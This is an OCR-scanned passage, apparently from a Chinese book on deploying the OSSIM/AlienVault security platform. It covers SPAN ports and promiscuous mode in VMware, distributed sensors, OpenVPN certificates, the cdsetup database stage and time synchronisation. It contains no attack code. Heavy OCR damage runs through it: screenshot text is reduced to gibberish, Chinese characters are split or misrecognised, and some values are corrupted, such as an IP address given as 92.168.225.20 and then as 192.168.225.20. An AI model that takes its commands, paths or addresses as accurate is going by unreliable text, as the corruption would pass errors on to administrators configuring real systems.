行 链 路 与 外 界 网 络 进行 连接 ， 这 里 Virtual Switch (vSwitch) 相当 于 一 个 虚拟 的 二 层 交 换 机 ， 
在 虚拟 机 中 安装 OSSIM USM 时 ， 建 议 安装 两 块 网 卡 ， 一 块 用 于 网 络 管理 ， 一 块 用 于 SPAN。 
如 图 2-30 所 示 。 


r 
@ OSSIM - Virtual Machine Properties [elo ma 
Hardware | optons | Resources | Virtual Machine Version: 8 
Device Status. 
F Show Al Devices Adá... Remove r 
| Hardware Summary WV. Connect at power on 
Wü Memory 6144 MB EE 
a ou 2 Current adapter: E1000 
E Videocard Video card ae j 
Q xs LS LogieParatel Han 
, [p0:0c:29:3e:fc:fà 
QQg Hard disk1 Virtual Disk EL 
Qs co/bvb drive 1 (]/usr/lib/vmware/isoi.... G Automatic C Manual 
E Network adapter 1 VM Network 
WE) Network adapter 2 (edite. SPAN Ports DirectPath 1/0 
Status: Not supported © 
Network Connecton. 
Network label: 
BES "d 
SPAN Ports 
VM Netnork 


2-30 设置 网 卡 SPAN 


(3) 我 们 需要 在 vSwitch 的 安全 控制 选项 中 ， 设 置 Promiscuous Mode 虚拟 交换 机 的 混杂 
模式 。 打 开 该 模式 ， 所 有 虚拟 网 卡 的 报 文 就 会 复制 到 vSwitch 的 所 有 vPort 上 面 。 我 们 就 可 以 
通过 OSSIM 实现 监控 。 如 图 2-31 所 示 。 接 着 我 们 需要 在 OSSM 控制 台 上 进入 Sensor 设置 ， 
将 ethl 设置 为 SPAN 口 的 网 卡 ， 如 图 2-32 所 示 。 
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D vswiteh Properties Loks 
Ports | Network adapters | 
Configuration ied rcd 
em Network Labet: SPAN Ports 
@ MNetwork ne. WAND: A8 (5095) 
ManagementNet.. v 
Effective Poloes 
e —— Security 
Promiscuous Mode: accept 
MAC Address Charges: Accept 
Forged Transits: Accept 


图 2-31 查看 SPAN 设置 
更 多 ESXi 设置 大 家 参考 下 面 链接 : 


http://pubs.vmware.com/vsphere-50/index.jsp?topic-$2Fcom.vmware.vsphere.net 
working. doc 50$2FGUID-8D1768B0-074D-4F06-9931-2BE4777D35F8.html 


Welcose ta Alienvauit Setup! 


| 3 tmable/Disable detector plugins 
| 4 Enable/Disable monitor plugins 
|. $ Enable/Disable Netflows Generator 


Select thg interfaces in promiscuous asde (Listening Interfaces) 
| Be 
2-32 OSSIM 控制 台 下 设置 网 卡 


2.6.2 ”虚拟 机 下 无 法 找到 磁盘 的 对 策 

在 虚拟 机 下 安装 OSSIM 系统 时 会 出 现 无 法 找到 硬盘 的 情况 ， 解 决 方法 是 ， 进 入 添加 设备 
界面 ， 选 择 “Add Device”， 然 后 进入 设备 驱动 选择 界面 ， 选 择 “BusLogic MutiMaster SCSI 
(BusLogic)”， 依 次 单 击 “OK” 按 钮 ， 选 择 “Done” 按 钮 完成 操作 。 如 果 在 ESXi 下 创建 虚 
拟 机 时 ，SCSI 控制 器 建议 选择 成 “LSI Logic Parallel”. 

为 什么 会 出 现 这 样 的 问题 ? 其 实 出 现 问题 的 原因 就 在 于 VMware 默认 将 硬盘 设置 为 
“SCSI-BusLogic” 模 式 ， 所 以 在 安装 一 些 Linux 发 行 版 时 ， 在 系统 启动 过 程 中 内 核 没有 加 载 
相应 驱动 程序 ， 故 无 法 找到 磁盘 。 


OSSIM 分 布 式 安装 实践 


首先 要 谈 谈 OSSIM 传输 安全 的 问题 ， 在 分 布 式 系统 中 Sensor 收集 的 日 志 要 安全 传输 到 
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OSSIM Server 必须 有 传输 加 密 机 制 ， 以 确保 收集 到 日 志 的 安全 性 。 在 OSSIM Server 中 集成 有 
权威 的 、 可 信赖 的 第 三 方 认 证 授权 中 心 ， 称 为 CA 认证 中 心 ， 它 运用 对 称 和 非 对 称 加 密 算法 、 
数字 证 书 、 数 字 签 名 等 技术 建立 起 一 套 严密 的 身份 认证 系统 。 


2.7.1 基于 OpenSSL 的 安全 认证 中 心 

SSL 为 Sensor 和 OSSIM Server 之 间 的 通信 实体 , 提供 一 个 安全 通道 , 保证 数据 的 机 密 性 。 
在 服务 器 端 进行 强制 认证 ， 在 客户 端 进行 可 选 的 认证 服务 ， 从 而 防止 监听 、 自 改 、 消 息 伪造 ， 
OSSIM 上 配置 的 Apache 服务 器 支持 SSL 协议 ， 当 客户 端 浏览 器 试图 连接 一 个 具有 SSL 认证 
功能 的 Apache 服务 器 时 ， 会 唤醒 SSL 会 话 ， 浏 览 器 才能 成 功 完成 认证 ， 用 户 能 确认 其 浏览 器 
连接 到 正确 的 服务 器 ， 而 不 是 连接 到 一 些 想 盗 取 用 户 密 码 等 重要 信息 的 虚假 的 服务 器 上 。 


2.7.2 ”安装 步骤 

A) 首先 是 在 监控 端 (Sensor 所 在 VLAN) 安装 好 OSSIM 配置 插件 文件 ， 例 如 Snort, 
ID 号 为 1001, 它 需要 在 snortconf 中 指定 日 志 输出 类 型 , 这 个 类 型 可 以 分 为 syslog、tcpdumplog、 
alert、unfield 几 类 ，OSSIM 默认 的 为 unfield 输出 。 

(2) 配置 代理 的 配置 文件 (config.cfg)， 指 定 outserver IP 为 发 送 服务 器 端的 IP 地 址 ， 添 
加 相应 插件 的 文件 路 径 , 例如 snort-/etc/ossim/agent/plugins/snortunified.cfg, 该 cfg 文件 中 可 以 
指定 获取 到 的 日 志 信息 路 径 ， 并 匹配 正则 表达 式 。 

(3) 在 Web 页 面 添加 Sensor。 分 布 式 OSSIM 系统 配置 的 关键 在 各 个 cf 配置 文件 上 ， 只 要 
指定 相应 的 日 志文 件 路 径 ， 那 么 Sensor 就 能 够 分 析 插 件 所 捕获 的 信息 ， 并 发 送 到 Server 端 。 

(4) 一 般 在 OSSIM Server 上 安装 双 网 卡 ， 一 块 用 于 接收 SPAN 的 流量 ， 另 一 块 用 于 远程 
管理 ， 从 而 避免 在 大 负载 情况 下 单 网 卡 负担 过 重 。 比 如 交换 机 与 OSSIM 的 连接 方式 如 图 2-33 
所 示 。 


交换 机 SPAN 


Ossim Server 
2-33 ”交换 机 与 OSSIM 连接 方式 


服务 器 上 采用 双 网 卡 , 其 分 工 通过 OSSIM 命令 行 控制 台 AlienVault Setup, 选择 Configure 
| Sensor— Configure Network Monitoring， 选 取 新 添加 的 网 卡 并 接受 应 用 设置 ， 即 可 将 管理 
| 口 和 监控 口 网 卡 区 分 开 。 
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2.7.3 DARME (VPN 连接 ) 举例 

VPN (虚拟 专用 网 ) 是 指 运 用 加 密 、 认 证 、 访 问 控制 等 技术 在 公用 网 络 上 构建 的 专用 罗 
辑 虚拟 子 网 它 使 得 物理 上 分 布 在 不 同 地 点 的 相关 用 户 通过 安全 的 “加 密 管 道 ” 在 公用 网 络 中 
通信 。 下 面 看 一 个 OSSIM 使 用 VPN 的 实例 。 首 先 安装 OSSIM Server 4.1， 四 个 组 件 均 安 装 ， 
服务 器 和 传感器 IP 规划 如 下 : 

€ 服务 器 IP: 92.168.225.20. 

€  SensorIP: 92.168.225.50. 


在 服务 器 器 成 功 启动 后 ， 先 检查 各 项 服务 工作 是 否 正 常 ， 然 后 开始 安装 传感器 ， 这 里 我 们 
选用 VPN 方式 和 服务 器 连接 ， 在 安装 时 为 系统 分 配 一 个 内 网 IP， 主 要 用 于 和 服务 器 通信 。 我 
们 输入 服务 器 IP 地 址 ， 这 时 系统 提示 “Would you like the system to configure the connection 
between this host and Alienvault Server (192.168.225.20) using a VPN Network?Network 
connectivity between the two host will be required to apply this configuration”， 如 果 按 往常 操作 
我 们 不 通过 VPN， 直 接 选 择 NO 就 会 继续 安装 ， 这 里 我 们 选择 Yes 进行 VPN 连接 测试 ， 系 统 
提示 “Please,enter the root user password of the remote Alienvault Server (192.168.225.20) ”。 
注意 : 192.168.225.20 这 个 地 址 为 自己 设置 。 

当 VPN 连接 成 功 以 后 ， 系 统 提示 “A VPN Network has been configured between the 
AlienVault Server and this host. The IP address used by this host vithin the VPN network is 
10.67.68.12,and the ip address of the AlienVault Server is 10.67.68.1”。 


1 . 检查 Server 和 Sensor 之 间 通 信 


(1) 检查 日 志 。 
检查 日 志 命 令 如 下 所 示 。 执 行 结果 如 图 2-34 所 示 。 


sensor:~# tail -f /var/log/ossim/agent.log 


图 2-34 查看 Agent 日 志 


(2) 插入 一 个 新 Sensor， 并 进行 验证 。 
在 Configuration— Alienvault Components 选项 中 插入 一 个 新 的 sensor, llf 2-35 所 示 , IP 
地 址 设置 为 在 VPN 中 指定 的 Sensor IP. 
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mes 7 
Sensors Displaying 1 to 2 or D The Sensor has been updated successfully ) 
«New _} Modify =} Delete selected Š Apply <> Total Sensors:2 <> Active Sensors:2 gll Sensor Status 
ip Name Priority Version Status Description 
192.168.225.20 localhost. 5 410 - 
EEUU MM decas "mimm HIN pm 
Showrows[20 [v] i4 4 Page1 o! bhh aş 


K 2-35 加 入 新 Sensor 


然后 , 通过 SSH 登录 Sensor 即 会 产生 若干 日 志 。 接 下 来 就 可 以 在 Analysis SIEM 中 反映 
出 日 志 。 如 图 2-36 所 示 。 


Date Auenvau Sensor. interface 
20050917 224727 TET] Sensoa e37 012 r 
Event Type iD Category Sub-Category 
Normalized ES ml z 
Even. Proouct Type. Data Source 10 
Aitericalen ed DEP mow 
Destination Acdress. Destination Port Protocol 
(Host 20986052504 102 168 225 50 全 D Ter 
Unique Event iD Assts= D Priorty Reliability Risk 
im 1801103 2200 0006 2910.55 Zeit TEZ Er E e 
usemame serdatat userdataa 
ot SSHD ecm tn. E 


Context Event Covelinkretor a onv valle Aben Vaut Uried SIEM 


^ Alien Vault incident Response Authentication ! Failed [Taronomy 


» AlionVauit Incidont Rosponso: Authentication [Taxonomy] 


图 2-36 查看 日 志 


在 图 2-36 中 显示 的 SIEM 中 ，Unique EventID 表示 方式 为 UUID (HX UUID 的 知识 ， 
读者 可 参考 http://chenguang.blog.51cto.com/350944/1662284), 它 是 数据 库 中 的 主 健 值 , 能 唯一 
地 识别 事件 。 首 先 确 保 Server 端的 OpenVpn 服务 工作 正常 ， 然 后 在 Sensor 端 ， 安 装 时 可 以 选 
择 服务 器 IP 和 root 的 口令 ， 用 来 进行 VPN 连接 。 


2. 需要 注意 的 几 个 特殊 文件 


VPN 地 址 池 在 Server 端 的 ossim_setup.conf 配 置 文件 [vpn] 中 定义 ,通信 端口 默认 为 33800。 
在 OSSIM Server 端 ，/etc/openvpn/AVinfraestructure/keys/ 目 录 下 有 几 个 证 书 也 需要 注意 ， 它 们 
是 安装 OpenVPN 过 程 中 生成 Root CA 证 书 ,用 于 签发 Server 和 Client WEP, 其 中 ca.crt\ ca.key 
为 根 证 书 文件 。 

其 中 dh1024.pem 为 服务 器 生成 Diffie-Hellman 文件 (Diffie-Hellman 是 一 种 确保 共享 KEY 
安全 的 方法 )。Diffie-Hellman 机 制 的 巧妙 在 于 要 求 安全 通信 的 双方 , 可 以 使 用 这 个 方法 确定 对 
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称 密 钥 ， 同 样 用 这 个 密 钥 进行 加 密 和 解密 。 

密 钥 中 alienvcd.csr、alienvcd.crt、alienvcd.key 为 OSSIM 服务 器 生成 的 密 钥 及 证 书 。 在 服 
务 器 端的 /etc/openvpn/nodes 目录 下 存放 着 节点 密 钥 的 压缩 包 ， 格 式 为 IPtargz C40] n 
192.168.225.50.targz)， 在 Sensor 端的 /etc/openvpn/192.168.225.50/ 目 录 下 ， 存 放 着 根 证 书 和 
“crt” 、“.csr”“.key” 为 扩展 名 的 三 个 证 书 文件 。 务 必 保存 好 这 几 个 证 书 ， 防 止 根 证 书 文 
件 泄露 。 注 意 ; 这 里 的 192.168.225.50 为 示例 IP 地 址 。 


2.74 ”安装 多 台 OSSIM (Sensor) 

下 面 实验 将 带领 大 家 安装 分 布 式 OSSIM 系统 。 本 节 实 验 中 Sensor 配置 的 内 存 为 OSSIM 
Server 的 一 半 ， 实 验 拓扑 如 图 2-37 所 示 ， 卫 设置 如 下 : 

OSSIM ServerIP: 192.168.91.130 


Sensorl IP : 192.168.91.131 
Sensor2 IP: 192.168.91,135 


(1) 首先 安装 OSSIM USM， 然 后 再 安装 Sensors 


€ C) webul H 


图 2-37 OSSM 分 布 式 安装 


(2) 设置 Sensor。 

在 OSSIM 4.6 及 以 上 系统 添加 多 个 Sensor 和 OSSIM 4.1 的 过 程 有 些 不 同 ， 我 们 看 看 以 下 
步骤 : DHE Sensor 的 控制 台 上 ， 设 置 连接 到 Server， 具 体 做 法 是 在 Alienvault Setup 界面 下 ; 
加 选择 Configure Sensor; (Si ff Configure Alienvault Server IP; 四 输入 OSSIM Server 地 址 ; 
(iC i Configure Alienvault Framework IP; @ 输 入 OSSIM Server 地 址 (192.168.91.1300; @ 设 
Boe ZJRRIBIESESR GXEPE Apply all Changes， 使 设置 生效 ， 如 图 2-38 所 示 。 下 面 需要 
在 OSSIM Web UI 中 继续 添加 Sensor 信息 到 数据 库 。 
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在 Sensor 的 控制 台 
http://wwu.alienvault .com 


Access the hlienUault web interface using the folle? 
https://127.0.0.1 
一 一 一 一 一 一 一 一 ~、 
输入 ServerIP 地 址 
lienuault USM 4.14 - x86 64 - ttul 


lienuault login 


eR Alienvault de IP 


Configure Data Source Plugins 
Configure Monitor Plugins 
Enable Netflow Generator 


Maintenance & Troubleshooting 
Jailbreak System 

About this Installation 
Reboot. Rppliance 

Shutdown Appliance 

Apply all Changes 


sons unmo 


图 2-38 设置 Sensor 


(3) 在 OSSIM Web UI 上 设置 连接 。 
当 Sensor 连接 到 Server 并 重新 启动 之 后 ， 我 们 在 Web UI 菜单 中 依次 单 击 Configuration 
一 Deployment 一 Components 一 Sensors， 这 时 能 看 到 如 图 2-39 所 示 的 提示 。 
DEPLOYMENT € 
components 


ALIENVAULT CENTER ENSOR ERVER 


Warning: T 


图 2-39 添加 Sensor 


im 这 时 选择 “Insert” 按 钮 ， 而 不 能 使 用 选择 “New” 手 工 输入 IP 地 址 的 方法 。 | 


只 有 在 进行 root 管理 员 密码 验证 成 功 后 ， 才 能 添加 到 OSSIM Server， 添 加 界面 如 图 2-40 
所 示 。 
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Values marked with (*) are mandatory 


iP 2 m 
PRIORITY 5 iv] 
TIMEZONE UTC Iv] 
DESCRIPTION 


Please enter the root password of the remote system in order to configure it. 


图 2-40 进行 管理 员 验 证 
经 过 以 上 3 个 步骤 即 可 完成 Sensor 与 Server 之 间 的 连接 。 
(4) 为 Sensor 改名 。 
首次 添加 的 Sensor 机 器 名 称 默认 都 为 alienvault， 这 样 容易 混淆 ， 所 以 我 们 必须 手动 修改 


各 Sensor 的 名 称 。 在 Deployment 一 Components 一 Sensors 菜单 下 ， 单 击 新 添加 的 传感器 
alienvault， 会 出 现 图 2-41 所 示 画 面 ， 这 时 可 在 Name 选项 中 修改 主机 名 。 


2EPLOYMENT 修改 Sensor 主 机 名 

COMPONENTS SCHEDULER LOCATIONS 

ALIENVAULTCENTER | SENSORS | SERVERS v 

M " PRIORITY 5 
KE 
owg Tv] 新 添加 2 TezowE is 
PucmY poer vesson pescon 
s a " E 


19216531282 aenvaur 5 — 503 


图 2-41 修改 Sensor 名 称 


Eg Timezone 为 GMT+8 (北京 时 间 ) ， 整 个 分 布 式 系统 统一 为 GMT+8。 


(5) 连接 验证 。 
在 添加 Sensor 成 功 后 ， 我 们 可 以 在 多 个 地 方 查 看 传感器 : Web UI 首页 的 仪表 盘 中 查看 ， 
如 图 2-42 所 示 。Ntop 服务 中 查看 Sensor， 如 图 2-43 所 示 。 
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SIEM: EVENTS BY SENSOR/DATA SOURCE {l > 


PROFILES 
PTOA SERVICES GLOBAL THROUGHPUT MATRIX 
@ sensori $ 
* 192.16; 30 [alienvault] 
9; 


SENSOR: [CENTS 5 [sensor2 INTERFACE: [etho| v 
T 192.168.91.131 [SENSOR] 


About Summary AllProtocols IP Utils Plugins Admin 


图 2-42 ”仪表 盘查 看 Sensor 图 2-43 Ntop 服务 中 查看 Sensor 
在 多 Sensor 环境 中 ， 需 要 指定 默认 NTOP Sensor， 如 图 2-44 所 示 。 
OSSIM FRAMEWORK A 


路 径 : Configuration-Administrator-Main 


PHP Configuration (graphs, acls, database api) and links to other applications 


sensor2 [192.168.91.135; 


Internet Connection Availability [Yes v. 


Resolve IPs No [v o 

Open Remote NFsen in the same frame [No [v] o 

Default Ntop Sensor First available sensor, o 
alienvault [192.168.91.130] 

MDS salt for passwords SENSOR1 [192.168.91.131] o 


244 多 传感器 选择 


在 多 Sensor 环境 中 的 SIEM 控制 台中 ， 进 行 高 级 搜索 时 ， 也 需要 指定 对 哪 一 个 Sensor 进 
行 搜索 ， 如 图 2-45 所 示 。 


ADVANCED SEARCH 


[jan Iv] 22 2015 [v] ]: lE ] 


Event Time: 


[AND v] 
[Zw [Ene Emo FDIOI| ]:D:D ER 


Risk: [[amyrisk] v] Priority: | [v] [Cany Prieriy jl 


Asset: [Tv] [any Asset] v] Reliability: [Tv] Tany Reliability iv] 


QUERY DB 


2-45 查询 不 同 Sensor 中 的 SIEM 事件 信息 
(6) 中 断 Sensor 和 OSSIM Server 的 连接 。 
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Sensor 已 经 成 功 连接 OSSIM Server A 后 , 能 否 再 次 作为 另 一 台 OSSIM Server 的 传感器 使 
HE? 除了 新 装 一 台 方 法 之 外 , 我 们 只 需要 改变 一 点 配置 即 可 达到 目的 。 首先 在 OSSIM Server 
A 上 删除 Server 与 Sensor 的 配置 连接 , 然后 再 到 Sensor 控制 台 上 添加 新 的 Server 地 址 和 框架 
地 址 ， 接 着 选择 保存 并 应 用 系统 设置 ， 最 终 可 以 到 Web UI 界面 中 把 sensor 添加 进来 。 


i 如 果 直 接 删除 Sensor 连接 文件 ,系统 会 提示 无 法 删除 ,如 图 2-46 所 示 。 这 时 需要 删除 Sensor 
| 下 的 Asset 和 所 监控 网 段 的 信息 ， 然 后 Sensor 连接 文件 才 可 顺利 删除 。 


DEPLOYMENT 
COMPONENTS SCHEDULER SMART EVENT COLLECTION LOCATIONS 
ALIENVAULT CENTER | SENSORS | SERVERS | Sorry, sensor not deleted. If you do that, 16 assets will be 
- misconfigured. One network will be misconfigured 
"Local 192 168 11 0 24" 
[2 [e] 
IP NAME PRIORITY PORT VERSION STATUS DESCRIPTION 
192.168.11.89 alienvault 5 40001 4140 
192.168.11.105 VirtualUSMA/lInOne 5 40001 4150 "d 


2-46 直接 删除 连接 文件 时 的 报错 提示 


(1) 注 意 1: 如 果 输入 密码 不 正确 , 系统 提示 “Cannot add system with IP 10.32.1X.Y Please 
verify that the system is reachable and the password is correct.” 时 可 以 重新 输入 正确 的 密码 。 如 
果 在 图 2-46 中 ， 单 击 “NEW” 按 钮 来 建立 一 条 连接 则 不 会 连接 成 功 。 

(2) 注意 2: 当 新 的 Sensor 添加 到 OSSIM Server 之 后 , 便 会 在 /var/alienvault/ 目 录 下 产生 

-个 以 UUID 命名 的 目录 ， 这 个 具体 名 称 就 是 Sensor 上 执行 “alienvault-system-id” 的 结果 。 
该 目录 下 的 ossec 目录 用 于 存放 规则 和 ossec agent 可 执行 文件 。 

G) 注意 3: 当成 功 添加 完成 Sensor 与 Server 之 间 连 接 之 后 ， 在 Sensor 的 /home/avapi/ 
目录 下 会 生成 两 个 特殊 目录 “.ssh”、“.ansible” 而 且 在 “.ssh” 目 录 下 还 会 生成 authorized_keys 
文件 ， 默 认 权限 为 600，sshd 进程 会 使 用 该 文件 中 的 key 进行 验证 。 


除了 Web 方式 可 以 直观 地 显示 Server 和 Sensor 状态 以 外 ， 还 可 以 通过 命令 行 方式 获 
取信 息 。 


#alienvault-api systems 

Gathering systems data.. 

564dc9cd-5bd5-8a3d-d613-3a323a8e4cba - 'trustis-ossim-dmz' - 192.168.101.156 
- Reachable 

44454c4c-5700-104c-804c-b7c04f543032 - 'trustis-ossim' - 192.168.107.45 - 
Reachable 
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第 二 种 方法 ， 同 样 可 以 获得 注册 系统 的 ID 号 : 


#alienvault-api get registered systems 


第 三 种 方法 ， 直 接 从 数据 库 中 查询 : 


#echo 'select name,inet6 ntoa(admin ip) from system;' |ossim-db 


Alienvault Center 和 Sensor 的 通信 依托 SSH 协议 ， 无 须 输 入 SSH 密码 登录 ， 一旦 SSH 证 
书 出 现 问 题 ， 例 如 我 们 可 以 把 /home/avapi/.ssh/authorized_keys (此 时 文件 权限 为 644) 稍微 处 
理 一 下 ， 那 么 再 次 查看 Alienvault Center 状态 就 会 出 现 “Down” 提 示 ， 表 示 双 方 无 法 连接 。 

- 些 初学 者 好 高 琉 远 ,最 基础 的 单机 部 署 都 没 做 ， 直接 开始 分 布 式 部 署 ， 再 加 之 错误 的 配置 方 
式 ， 容 易 造 成 Server 和 Sensor 之 间 无 法 通信 ， 如 图 2-47 所 示 。 和 希望 读者 从 单 网 卡 的 混合 方式 
安装 ， 逐 渐 过 渡 到 多 网 卡 的 分 布 式 安装 模式 。 


ALIENVAULT CENTER | SENSORS SERVERS 
I w ESELECTED «> Total Sensors; 2 4> Active Sensors: 1 
p Wve PHORTY PORT verson STATUS. DESCRIPTION 


103214133 aliervault 5 — a 4100 v 


( X ) —— w Sensor 无 法 连接 Server 


图 2-47 Sensor 与 Server m 
如 果 出 现 报错 ， 就 需要 重新 添加 一 次 ， 可 在 Sensor 的 控制 台 上 使 用 如 下 命令 : 


#/etc/init.d/ossim-agent stop 
#/etc/init.d/ossim-agent start 
(4) 注意 4: 多 传感器 的 选择 不 适合 于 Nagios 服务 ， 在 Environment 一 Availability 一 
Monitoring 中 选择 其 他 Sensor. 则 会 出 现 “Unable to connect to Nagios sensor” 在 分 布 式 OSSIM 
系统 中 往往 有 多 个 探 针 ， 通 常 我 们 需要 设置 首 个 有 效 的 传感器 ， 有 具体 调整 位 置 在 
Configuration 一 Administration 一 Main 一 OSSIM Framework 菜单 下 面 Default Ntop Sensor 选项 中 
调整 。 
(5) 注意 5: 分 布 式 OSSIM 系统 中 ，Sensor 配置 里 OUTPUT 的 IP 地址 为 OSSIM Server 
地 址 ， 在 混合 式 OSSIM 系统 中 Sensor 里 OUTPUT 的 IP 为 127.0.0.1， 参 考 图 1-15 所 示 。 
有 些 读者 或 许 会 思考 ， 到 底 OSSIM 支持 多 少 个 Sensor 连接 ， 有 限制 吗 ? 只 要 硬件 配 
置 足够 ,对 于 分 布 式 环境 支持 的 Sensor 数量 没有 限制 。 读 者 还 可 以 通过 在 命令 行 下 输入 以 
下 命令 从 数据 库 来 查看 添加 的 Sensor 主机 名 和 IP 地 址 ， 以 及 UUID 等 信息 。 如 图 2-48 所 
示 。 


113 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


lienuault:^tt echo “SELECT NAME, inet6 ntoa(admin ip) FROM system;’ lossim-db 
AME inet6 ntoa(admin ip) 


lienuault 192.168.91.225 

lienvault 192.168.91.224 

lienvault:^t — 

lienvault: ^f alienvault-api get ; registered : systems 
fadmir j 


图 2-48 查看 管理 IP 地 址 及 网 络 信息 


2.7.5 Sensor 重 装 流程 

部 署 在 各 VLan 中 的 Sensor 如 果 发 生 故 障 ， 例 如 发 生 宕 机 事故 ， 将 无 法 收集 监控 信息 ,这 
时 需要 管理 员 立 即 恢复 Sensor, 这 里 的 修复 就 只 是 重 装 ， 因 为 这 种 方式 速度 最 快 。 方 法 是 选择 
安装 菜单 中 第 二 项 Sensor， 经 过 15~20 分 钟 ，Sensor 即 可 安装 完毕 。 接 下 来 开始 配置 Sensor, 
将 它 加 入 OSSIM Server 中 。 

首先 ， 升 级 系统 (alienvault-update)， 确 保 新 添加 Sensor 机 器 名 称 和 原来 相同 ， 耕 则 事件 
的 Sensor 属性 会 出 现 “N/A”， 代 表 Not Applicable 不 适用 )。 

其 次 ， 同 步 时 钟 、 添 加 监控 网 段 、 添 加 监控 插件 。 

再 次 ， 配 置 Sensor 一 配置 Alienvault Server IP 一 配置 Alienvault Framwork IP o 

最 后 ， 所 有 的 配置 都 和 以 前 故障 机 Sensor 一 样 ， 配 置 好 后 可 以 到 Configuration 一 
Deployment 一 Components 的 Sensors 中 进行 确认 。 做 完 这 些 工 作 ， 一 台新 的 Sensor 又 可 以 继 
续 为 OSSIM Server 收集 信息 。 


添加 VPN 连接 


2.8.1 需求 

如 果 需 要 监控 多 个 分 布 在 异地 的 数据 中 心 ， 则 需要 在 异地 的 机 房 内 安装 Sensor， 最 后 将 
OSSIM Server 和 Sensor 之 间 通 过 VPN 方式 连接 , 以便 安全 地 获取 数据 。 注意 以 下 实验 在 两 台 
机 器 中 完成 。 

采用 VPN 方式 连接 ， 在 OSSIM 采用 OpenVPN， 它 基于 OpenSSL 库 的 应 用 层 VPN. F 
面 我 们 以 OSSIM 4.1 为 例 ， 假 设 Server IP 地 址 为 10.0.0.30，Sensor 地 址 为 10.0.0.31， 手 工 配 
置 VPN 连接 方法 在 下 面 两 个 小 节 中 说 明 。 


2.8.2 Server 端 配置 (10.0.0.30) 
(1) 编辑 文件 /etc/ossim/ossim_setup.conf， 按 以 下 方式 修改 变量 。 
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(2) 为 新 添加 的 主机 名 修改 /etc/hosts 和 /etc/hostname 
G) 在 修改 ossim_setup.conf 后 ， 必 须 运行 “ossim-reconfig” 使 得 配置 生效 。 


(4) 生成 VPN 配置 文件 。 
首先 建立 一 个 PKI (Public Key Infrastructure， 公 钥 基 础 设施 )。PKI 包括 服务 端 和 每 个 客 


户 端 都 有 一 个 证 书 ( 也 称 做 公 钥 ) 和 私 钥 。 一 个 认证 机 构 CA》 的 证 书 和 私 钥 ， 用 来 为 每 一 
个 服务 端 和 客户 端 颁发 证 书 。 


此 时 会 在 /etc/openvpn/nodes 目录 下 生成 一 个 10.0.0.31.tar.gz 的 压缩 文件 ， 其 中 保存 了 
ca.crt、10.0.0.31.key、10.0.0.31.cry 以 及 10.0.0.31.conf 配置 文件 。 
接 下 来 ， 需 要 将 这 个 压缩 包 复制 到 Sensor (10.0.0.31) 主机 的 /etc/openvpn 目录 下 。 


2.833 配置 Sensor (10.0.0.31) 
(1) 编辑 /etc/network/interfaces 使 用 静态 IP ， 例 如 10.0.0.31。 


(2) 在 Sensor 上 编辑 /etc/ossim/ossim setup.conf. 
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G) 添加 新 主机 名 到 文件 /etc/hosts 和 /etc/hostname。 
(4) 解压 缩 刚 才 生 成 的 VPN tar 包 ， 并 重启 Openvpn。 


C5) 配置 Sensor 上 的 /etc/ossim/ossim_setup.conf 文件 。 


(6) 最 后 检查 Server 和 Sensor 之 间 的 通信 。 
检查 日 志文 件 : 


人 .日 ”安装 最 后 阶段 


在 OSSIM Server 安装 最 后 阶段 会 提示 “正在 运行 cdsetup…”, 可 能 有 读者 在 实验 过 程 中 
会 思考 ， 怎 么 每 次 在 安装 过 程 最 后 阶段 ， 即 cdsetup 运行 阶段 总 是 很 慢 呢 ? 是 不 是 在 上 网 更 新 
数据 ? 其 实 不 然 ， 最 后 结束 安装 阶段 这 一 过 程 比较 长 ， 主 要 的 工作 是 创建 初始 化 数据 库 
(alienvault_siem、asec database 及 datewarehouse 等 ，alienvault-siem 用 于 记录 Snort 报警 事件 
信息 )， 然 后 进行 各 类 表 创 建 、 插 入 初始 化 数据 条 目 ， 在 最 后 cdsetup 阶段 按 Ctrl+Alt+F4 组 合 
键 可 以 看 到 : 
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以 OSSIM 4.3 版 本 为 例 ， 在 cdsetup 阶段 需要 创建 13 个 数据 库 ， 大 约 300 多 张 表 和 对 其 

进行 初始 化 工作 。 不 过 这 一 步 也 不 是 所 有 安装 模式 都 有 ， 例 如 前 面 提 到 在 某 个 VLAN 中 部 署 
-个 传感器 Sensor 就 没有 必要 安装 数据 库 ， 这 时 在 安装 最 后 就 不 会 创建 数据 库 、 表 以 及 写 入 

初始 数据 。 

注意 ，clamav.sql 和 ossim-directive.sql 等 文件 内 容 写 到 /usr/share/doc/ossim-mysql/contrib/ 
plugins/ 目 录 下 。 我 们 还 需要 了 解 男 一 个 细节 ,在 安装 后 期 将 执行 /usr/share/alienvault-center/lib/ 
Avconfig profile database.pm 脚本 ， 其 内 容 为 建立 OSSIM 主要 的 13 个 数据 库 ， 其 指令 是 通过 
zcat 直接 读 取 *.sql.gz 压缩 包 的 内 容 ， 然 后 导入 到 OSSIM 数据 库 中 。 例 如 : 

#zcat /usr/share/doc/ossim-mysql/contrib/OSVDB-tabales.sql.gz | ossim-db 
osvdb 

另 一 条 OSSIM 中 常用 到 命令 如 下 : 

#gunzip <backupfile.sql.gzlmysql -u 用户 -p 密码 database 数据 库 名 称 


OSSIM 安装 后 续 工 作 


2.10.1 时 间 同 步 问题 

使 用 OSSIM 的 过 程 中 ， 需 要 用 到 各 种 数据 分 析 软 件 ， 这 些 软件 需要 采集 网 络 上 很 多 的 事 
件 信息 。“ 时 间 戳 ”对 于 这 些 事件 及 后 续 的 数据 分 析 有 很 重要 的 作用 。 在 安装 OSSIM 时 ， 如 
果 用 户 选 错 了 时 区 的 配置 ， 导 致 系统 时 间 和 当前 时 间 不 符 , 将 使 取证 日 志 发 生 偏差 。 下 面 介绍 
如 何 修改 时 间 。 其 中 date 命令 设置 系统 时 间 ， 而 不 是 硬件 时 钟 。 尤 其 是 大 家 做 实验 的 时 候 使 
用 虚拟 机 安装 OSSIM， 对 于 这 两 个 时 钟 需 一 致 。 

我 们 先 要 确保 时 区 正确 ， 调 整 时 区 命令 为 : 

#dpkg-reconfigure tzdata 


在 弹出 对 话 框 中 选择 “Asia” 一 “Shanghai”。 

当然 ， 也 可 以 通过 tzselect 命令 来 更 改 时 区 ， 相 应 的 时 区 文件 在 
/usr/share/zoneinfo/Asia/Shanghai。 时 区 调整 完毕 之 后 ， 继 续 调 整 精确 的 系统 时 间 和 硬件 时 间 。 

格林 尼 治 时 间 服 务 器 同步 : 


# ntpdate time-a.nist.gov 
6 Feb 22:26:54 ntpdate[12159]: adjust time server 129.6.15.28 offset -0.045589 
sec 


查看 时 间 : 


# date 
2014 年 12H 22 日 星期 二 12:51:28 CST 


Tiz 
